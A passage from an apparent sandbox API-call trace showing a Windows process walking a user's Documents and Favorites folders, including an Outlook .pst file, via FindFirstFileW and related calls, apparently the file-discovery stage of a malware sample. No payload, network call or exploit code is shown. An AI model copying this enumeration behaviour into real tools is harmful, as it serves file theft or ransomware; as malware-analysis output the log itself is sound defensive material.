cAlternateFileName="YJQRGI~1.ODS")) returned 1 [0143.013] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6228aa00, ftCreationTime.dwHighDateTime=0x1d5de5b, ftLastAccessTime.dwLowDateTime=0x3138f9c0, ftLastAccessTime.dwHighDateTime=0x1d5e0ce, ftLastWriteTime.dwLowDateTime=0x3138f9c0, ftLastWriteTime.dwHighDateTime=0x1d5e0ce, nFileSizeHigh=0x0, nFileSizeLow=0xa452, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zaxyuJRACVV3OIKgQpJF.xlsx", cAlternateFileName="ZAXYUJ~1.XLS")) returned 1 [0143.013] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6228aa00, ftCreationTime.dwHighDateTime=0x1d5de5b, ftLastAccessTime.dwLowDateTime=0x3138f9c0, ftLastAccessTime.dwHighDateTime=0x1d5e0ce, ftLastWriteTime.dwLowDateTime=0x3138f9c0, ftLastWriteTime.dwHighDateTime=0x1d5e0ce, nFileSizeHigh=0x0, nFileSizeLow=0xa452, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zaxyuJRACVV3OIKgQpJF.xlsx", cAlternateFileName="ZAXYUJ~1.XLS")) returned 0 [0143.013] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.013] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.013] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0143.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.013] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.013] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.013] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.013] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.013] PathFindFileNameW (pszPath="") returned="" [0143.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.013] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6228aa00, ftCreationTime.dwHighDateTime=0x1d5de5b, ftLastAccessTime.dwLowDateTime=0x3138f9c0, ftLastAccessTime.dwHighDateTime=0x1d5e0ce, ftLastWriteTime.dwLowDateTime=0x3138f9c0, ftLastWriteTime.dwHighDateTime=0x1d5e0ce, nFileSizeHigh=0x0, nFileSizeLow=0xa452, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zaxyuJRACVV3OIKgQpJF.xlsx", cAlternateFileName="ZAXYUJ~1.XLS")) returned 0xffffffff [0143.014] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.014] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.014] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.014] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.014] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.014] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.014] PathFindFileNameW (pszPath="") returned="" [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.014] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6228aa00, ftCreationTime.dwHighDateTime=0x1d5de5b, ftLastAccessTime.dwLowDateTime=0x3138f9c0, ftLastAccessTime.dwHighDateTime=0x1d5e0ce, ftLastWriteTime.dwLowDateTime=0x3138f9c0, ftLastWriteTime.dwHighDateTime=0x1d5e0ce, nFileSizeHigh=0x0, nFileSizeLow=0xa452, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zaxyuJRACVV3OIKgQpJF.xlsx", cAlternateFileName="ZAXYUJ~1.XLS")) returned 0xffffffff [0143.014] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.014] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.014] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.014] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.015] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.015] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.015] PathFindFileNameW (pszPath="") returned="" [0143.015] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.015] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.016] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.016] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0143.016] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0143.016] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0143.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x6817e8 [0143.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x681870 [0143.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x681980 [0143.016] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0143.016] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.016] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.016] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="My Videos\\" [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.017] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.017] PathFindFileNameW (pszPath="") returned="" [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.017] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0143.017] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="Outlook Files\\" [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.017] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.017] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.018] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.018] PathFindFileNameW (pszPath="") returned="" [0143.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x3281098 [0143.018] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.018] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.018] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0143.018] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0143.018] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.018] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b5c8 [0143.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.018] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0143.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b970 [0143.018] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0143.018] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.019] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.019] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.019] PathFindFileNameW (pszPath="") returned="" [0143.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b970 [0143.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.019] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.019] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0143.019] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0143.019] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0143.019] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0143.019] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0143.019] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0143.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x681870 [0143.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0143.019] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0143.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x32724a0 [0143.019] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x325b630 [0143.020] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0143.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0143.020] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0143.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1a28 [0143.020] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0143.020] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0143.020] PathFindFileNameW (pszPath="") returned="" [0143.020] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x681870 [0143.020] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0143.202] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0143.203] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0143.203] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0143.203] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0143.203] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, 